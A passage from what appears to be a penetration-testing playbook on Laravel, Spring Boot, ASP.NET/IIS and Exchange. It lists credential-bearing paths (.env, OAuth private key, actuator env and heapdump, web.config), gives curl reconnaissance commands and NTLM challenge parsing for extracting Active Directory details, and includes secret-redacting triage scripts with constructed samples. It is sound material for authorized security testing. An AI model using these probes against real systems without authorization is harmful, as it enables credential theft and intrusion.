8. LARAVEL, SPRING BOOT, ASP.NET, EXCHANGE &amp;amp; OTHER FRAMEWORKS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="81-laravel--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#81-laravel--attack-surface"&gt;
##
&lt;/a&gt;
8.1 Laravel — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Environments&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/.env, /.env.example, /.env.production, /.env.local
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Passport OAuth keys (with the private key exposed, any access token can be forged)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/storage/oauth-private.key
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/storage/oauth-public.key
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Logs (tokens, queries, emails, stack traces)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/storage/logs/laravel.log
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/storage/logs/laravel-2026-*.log
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Debug (if APP_DEBUG=true)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Any 500 error returns the full stack trace with SQL queries&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Exposed Artisan commands&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/artisan
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Laravel Telescope (debug dashboard)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/telescope/requests, /telescope/exceptions, /telescope/queries
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Laravel Horizon (queue dashboard)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/horizon/dashboard
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Routes (in production, rarely exposed)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/routes
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# API docs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/docs, /api/documentation, /swagger
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: OVH server with Laravel — &lt;code&gt;.env&lt;/code&gt;, &lt;code&gt;.git/config&lt;/code&gt;, &lt;code&gt;storage/oauth-private.key&lt;/code&gt; all exposed in production (200 OK), exposing MySQL, SendGrid, cloud storage and Firebase credentials.&lt;/p&gt;
&lt;h3 id="82-spring-boot-java" &gt;
&lt;div&gt;
&lt;a href="#82-spring-boot-java"&gt;
##
&lt;/a&gt;
8.2 Spring Boot (Java)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Actuators — POWERFUL if exposed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/env → Environment variables &lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;DB, secrets!&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Caveat: Boot 1.x/2.x mask values whose key name contains password/secret/key/token/credentials as ******; 3.x masks every value unless management.endpoint.env.show-values is set. Plaintext still leaks where the key name escapes the sanitizer (DB_PWD) or the secret sits inside a connection string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/health → Status
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/beans → Loaded beans
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/mappings → ALL application endpoints
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/heapdump → Heap download &lt;span style="color:#99d1db;font-weight:bold"&gt;(&lt;/span&gt;contains credentials in memory!&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/loggers → Logging configuration
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/metrics → Internal metrics
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/actuator/prometheus → Prometheus metrics
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Swagger/OpenAPI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/swagger-ui.html, /swagger-ui/index.html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/v2/api-docs, /v3/api-docs
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# H2 Console (RCE if exposed)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/h2-console
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Indicative header:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# X-Application-Context: application:prod:8080&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# (sent by Spring Boot 1.x by default; on 2.x+ only if management.server.add-application-context-header=true, so its absence proves nothing)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Health platform (Spring Boot) — Spring Boot in production with &lt;code&gt;X-Application-Context: application:prod:8080&lt;/code&gt;. Actuators listed but blocked by F5 BIG-IP. If F5 bypass → full access to &lt;code&gt;/actuator/env&lt;/code&gt; with database credentials.&lt;/p&gt;
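&lt;p&gt;Added example serving both 8.1 and 8.2 (not the playbook&amp;rsquo;s own code): once a Laravel &lt;code&gt;.env&lt;/code&gt; or a Spring Boot &lt;code&gt;/actuator/env&lt;/code&gt; answers 200, the next job is triage for the report. The code below parses both formats, picks out the keys that carry credentials, and redacts each value so the finding proves the leak without copying the secret. For the actuator it also separates values the Boot sanitizer masked as &lt;code&gt;******&lt;/code&gt; (key exists, nothing leaked) from the ones that came back in plaintext. The key-name patterns are an assumption to extend per engagement; the &lt;code&gt;.env&lt;/code&gt; text and the actuator JSON are constructed samples.&lt;/p&gt;

```python
"""Triage of leaked configuration (added example, not the playbook's code).

Covers 8.1 and 8.2: a Laravel .env fetched from the web root, and the JSON a
Spring Boot /actuator/env returns. Both become the same finding shape with the
secret redacted. All inputs below are constructed samples.
"""
import json
import re
from typing import Iterable

# Key names that usually carry credentials (assumption; extend per engagement)
SECRET_KEY = re.compile(r"(pass(word)?|pwd|secret|token|credentials?|_key)$", re.I)
# Connection strings with embedded credentials: scheme://user:pass@host
URL_WITH_CREDS = re.compile(r"^[a-z][a-z0-9+.-]*://[^:/@]+:[^@]+@", re.I)
SPRING_MASK = "******"  # what Boot's Sanitizer substitutes for masked values


def redact(value: str) -> str:
    """Keep two characters at each end: enough to match, not enough to reuse."""
    if len(value) <= 4:
        return "*" * len(value)
    return f"{value[:2]}{'*' * (len(value) - 4)}{value[-2:]}"


def is_secret(key: str, value: str) -> bool:
    return bool(SECRET_KEY.search(key)) or bool(URL_WITH_CREDS.match(value))


def parse_dotenv(text: str) -> dict[str, str]:
    """Minimal dotenv parser: comments, blanks, optional 'export', quoted values."""
    env: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        value = value.strip()
        if value[:1] in ("'", '"'):
            end = value.find(value[0], 1)                 # closing quote
            value = value[1:end] if end != -1 else value[1:]
        else:
            value = value.split(" #", 1)[0].rstrip()      # drop inline comment
        env[key.strip()] = value
    return env


def triage_dotenv(text: str) -> list[dict]:
    env = parse_dotenv(text)
    findings = [{"source": ".env", "key": k, "value": redact(v)}
                for k, v in env.items() if v and is_secret(k, v)]
    if env.get("APP_DEBUG", "").lower() == "true":      # stack traces + SQL on any 500
        findings.append({"source": ".env", "key": "APP_DEBUG", "value": "true"})
    return findings


def walk_actuator_env(doc: dict) -> Iterable[tuple[str, str, str]]:
    """/actuator/env layout: propertySources[].properties[key].value"""
    for source in doc.get("propertySources", []):
        for key, prop in source.get("properties", {}).items():
            yield source.get("name", "?"), key, str(prop.get("value", ""))


def triage_actuator(doc: dict) -> list[dict]:
    """Masked values are reported as 'sanitized': the key exists, nothing leaked.
    Plaintext survives where the key name escapes the sanitizer (DB_PWD) or the
    secret sits inside a connection string (MONGO_URI)."""
    out = []
    for source, key, value in walk_actuator_env(doc):
        if is_secret(key, value):
            out.append({"source": source, "key": key,
                        "value": "sanitized" if value == SPRING_MASK else redact(value)})
    return out


SAMPLE_DOTENV = """# constructed sample .env
APP_KEY=base64:Q2hhbmdlTWVDaGFuZ2VNZUNoYW5nZU1lQ2hhbmdlTWU=
APP_DEBUG=true
APP_URL=https://shop.example
DB_HOST=10.0.0.5
DB_USERNAME=shop
DB_PASSWORD="s3cr3t pa55"   # quoted, keeps the space
export SENDGRID_API_KEY=SG.xxxxxxxx.yyyyyyyy
DATABASE_URL=mysql://shop:hunter2@10.0.0.5/shop
"""

SAMPLE_ACTUATOR = json.loads("""{
  "activeProfiles": ["prod"],
  "propertySources": [
    {"name": "systemEnvironment", "properties": {
      "DB_PWD": {"value": "Pr0d-Db-Pass!"},
      "MONGO_URI": {"value": "mongodb://app:Pr0d-Db-Pass!@db:27017/app"}}},
    {"name": "applicationConfig: [classpath:/application.yml]", "properties": {
      "spring.datasource.url": {"value": "jdbc:mysql://db:3306/app"},
      "spring.datasource.password": {"value": "******"},
      "jwt.secret": {"value": "******"}}}
  ]}""")

if __name__ == "__main__":
    for f in triage_dotenv(SAMPLE_DOTENV) + triage_actuator(SAMPLE_ACTUATOR):
        print(f"{f['source']:>45}  {f['key']:<28} {f['value']}")
```

&lt;p&gt;Feed it the body of the 200 response and paste the output into the finding. A row marked &lt;code&gt;sanitized&lt;/code&gt; is still a finding (the endpoint is reachable and names every secret the application holds), but it is a different severity from a row that shows redacted plaintext.&lt;/p&gt;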
&lt;h3 id="83-aspnet--iis" &gt;
&lt;div&gt;
&lt;a href="#83-aspnet--iis"&gt;
##
&lt;/a&gt;
8.3 ASP.NET / IIS
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Config files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/web.config, /web.config.bak
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Trace (if enabled)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/trace.axd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Elmah (error log)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/elmah.axd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ViewState (MAC validation)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If MAC disabled → deserialization RCE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# WebDAV&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If PUT enabled → webshell upload&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# ASP.NET versions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Server: Microsoft-IIS/10.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# X-AspNet-Version: 4.0.30319&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# X-Powered-By: ASP.NET&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Food industry — IIS 8.5 + ASP.NET 4.0 + ADFS exposed. Stack trace with internal Windows path leaked in 500 errors.&lt;/p&gt;
&lt;h3 id="84-exchange--owa--attack-surface" &gt;
&lt;div&gt;
&lt;a href="#84-exchange--owa--attack-surface"&gt;
##
&lt;/a&gt;
8.4 Exchange / OWA — Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Exchange is the most common corporate email server in government and large companies. Runs on IIS and exposes multiple endpoints.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 0. Identify Exchange&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Headers: X-OWA-Version, X-FEServer, X-AspNet-Version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Ports: 443 (OWA/ECP/EWS), 25 (SMTP), 587 (SMTP TLS)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Default Exchange endpoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path in /owa/ /ecp/ /ews/Exchange.asmx /autodiscover/autodiscover.xml &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; /powershell/ /OAB/ /Microsoft-Server-ActiveSync/ /api/; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$path&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;(HTTP|X-OWA|X-FE|X-Asp)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Extract version from header&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/owa/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;X-OWA-Version&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 15.1.2507.61 = Exchange 2016 CU23&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 15.2.1258.x = Exchange 2019 CU13 (CU14 is 15.2.1544.x); the 4th component tracks the Security Update&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Healthcheck (reveals internal server hostname!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/OWA/healthcheck.htm&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;200 OK&amp;lt;br/&amp;gt;ECBUE361.CNC.INTER&amp;#34; ← internal hostname + AD domain!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/ecp/healthcheck.htm&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Same pattern&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Detect authentication types&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/ews/Exchange.asmx&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;www-auth&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;Negotiate, NTLM, Basic realm=...&amp;#34; → Basic auth enabled!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="ntlm-challenge-capture--extract-active-directory-information" &gt;
&lt;div&gt;
&lt;a href="#ntlm-challenge-capture--extract-active-directory-information"&gt;
###
&lt;/a&gt;
NTLM Challenge Capture — Extract Active Directory Information
&lt;/div&gt;
&lt;/h4&gt;
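&lt;p&gt;Added example (not the playbook&amp;rsquo;s own code): the Type 2 parse carried through on a constructed challenge, so the offsets can be checked offline before pointing it at a target. Layout follows MS-NLMP 2.2.1.2 and the AV_PAIR ids 2.2.2.1 (AvId 1 is the NetBIOS computer name, 2 the NetBIOS domain, 3 and 4 the DNS equivalents). Beyond the hand parse below it also decodes the &lt;code&gt;NegotiateFlags&lt;/code&gt; (is the target a domain or a standalone server) and the optional &lt;code&gt;Version&lt;/code&gt; field, which gives the Windows major.minor.build of the Exchange server unauthenticated. The domain, host and challenge bytes are made up for the example.&lt;/p&gt;

```python
"""NTLM CHALLENGE_MESSAGE (Type 2) parser with a self-check (added example, not the
playbook's code). Field layout per MS-NLMP 2.2.1.2, AvId names per 2.2.2.1. The
challenge used below is constructed by build_type2(), not captured from a server."""
import base64
import struct
from datetime import datetime, timedelta, timezone

AV_NAMES = {1: "NetBIOS Computer", 2: "NetBIOS Domain", 3: "DNS Computer",
            4: "DNS Domain", 5: "DNS Tree", 6: "Flags", 7: "Timestamp", 9: "Target SPN"}
TARGET_TYPE_DOMAIN = 0x00010000
NEGOTIATE_VERSION = 0x02000000
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_type2(raw: bytes) -> dict:
    if raw[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", raw, 8)[0] != 2:
        raise ValueError("not an NTLM Type 2 message")
    tgt_len, _, tgt_off = struct.unpack_from("<HHI", raw, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", raw, 20)[0]                # NegotiateFlags
    challenge = raw[24:32]                                      # ServerChallenge
    ti_len, _, ti_off = struct.unpack_from("<HHI", raw, 40)     # TargetInfoFields
    info = {"target_name": raw[tgt_off:tgt_off + tgt_len].decode("utf-16-le"),
            "target_is_domain": bool(flags & TARGET_TYPE_DOMAIN),
            "challenge": challenge.hex(), "flags": flags, "av_pairs": {}}
    if flags & NEGOTIATE_VERSION:                               # Version at offset 48
        major, minor, build = struct.unpack_from("<BBH", raw, 48)
        info["os_version"] = f"{major}.{minor}.{build}"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", raw, pos)
        pos += 4
        if av_id == 0:                                          # MsvAvEOL
            break
        value = raw[pos:pos + av_len]
        pos += av_len
        if av_id == 7:                                          # FILETIME: 100ns since 1601
            ticks = struct.unpack("<Q", value)[0]
            decoded = (FILETIME_EPOCH + timedelta(microseconds=ticks // 10)).isoformat()
        elif av_id == 6:
            decoded = struct.unpack("<I", value)[0]
        else:
            decoded = value.decode("utf-16-le")
        info["av_pairs"][AV_NAMES.get(av_id, f"AvId {av_id}")] = decoded
    return info


def parse_www_authenticate(header: str) -> dict:
    """Pull the 'NTLM <base64>' token out of a WWW-Authenticate header and parse it."""
    for token in header.split(","):
        token = token.strip()
        if token.startswith("NTLM "):
            return parse_type2(base64.b64decode(token[5:]))
    raise ValueError("no NTLM challenge in header")


def build_type2(domain: str, host: str, dns_domain: str, challenge: bytes,
                build: int = 17763) -> bytes:
    """Construct a Type 2 message with the layout above (test fixture only)."""
    def av(av_id, value):
        return struct.pack("<HH", av_id, len(value)) + value
    u16 = lambda s: s.encode("utf-16-le")
    delta = datetime(2026, 6, 22, tzinfo=timezone.utc) - FILETIME_EPOCH
    ticks = (delta.days * 86400 + delta.seconds) * 10**7      # integer math, no float loss
    tgt = u16(domain)
    ti = (av(2, tgt) + av(1, u16(host)) + av(4, u16(dns_domain))
          + av(3, u16(f"{host}.{dns_domain}".lower())) + av(7, struct.pack("<Q", ticks))
          + av(0, b""))
    flags = TARGET_TYPE_DOMAIN | NEGOTIATE_VERSION | 0x00000001 | 0x00000200  # UNICODE, NTLM
    hdr_len = 56                                                # 48-byte header + Version
    msg = (b"NTLMSSP\x00" + struct.pack("<I", 2)
           + struct.pack("<HHI", len(tgt), len(tgt), hdr_len)
           + struct.pack("<I", flags) + challenge + b"\x00" * 8
           + struct.pack("<HHI", len(ti), len(ti), hdr_len + len(tgt))
           + struct.pack("<BBHBBBB", 10, 0, build, 0, 0, 0, 15))
    assert len(msg) == hdr_len
    return msg + tgt + ti


SAMPLE_CHALLENGE = bytes.fromhex("0123456789abcdef")          # constructed
SAMPLE_HEADER = "Negotiate, NTLM " + base64.b64encode(
    build_type2("CORP", "EXCH01", "corp.example", SAMPLE_CHALLENGE)).decode()

if __name__ == "__main__":
    for k, v in parse_www_authenticate(SAMPLE_HEADER).items():
        print(f"{k}: {v}")
```

&lt;p&gt;Against a live server, replace &lt;code&gt;SAMPLE_HEADER&lt;/code&gt; with &lt;code&gt;r.headers[&amp;#39;WWW-Authenticate&amp;#39;]&lt;/code&gt; from the Type 1 request in the next block. The &lt;code&gt;Timestamp&lt;/code&gt; pair doubles as a clock-skew check, and &lt;code&gt;os_version&lt;/code&gt; (e.g. 10.0.17763 is Windows Server 2019) is the kind of detail that otherwise needs an authenticated session.&lt;/p&gt;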
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;base64&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Step 1: Send NTLM Type 1 (negotiation)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;type1 &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=&amp;#39;&lt;/span&gt;
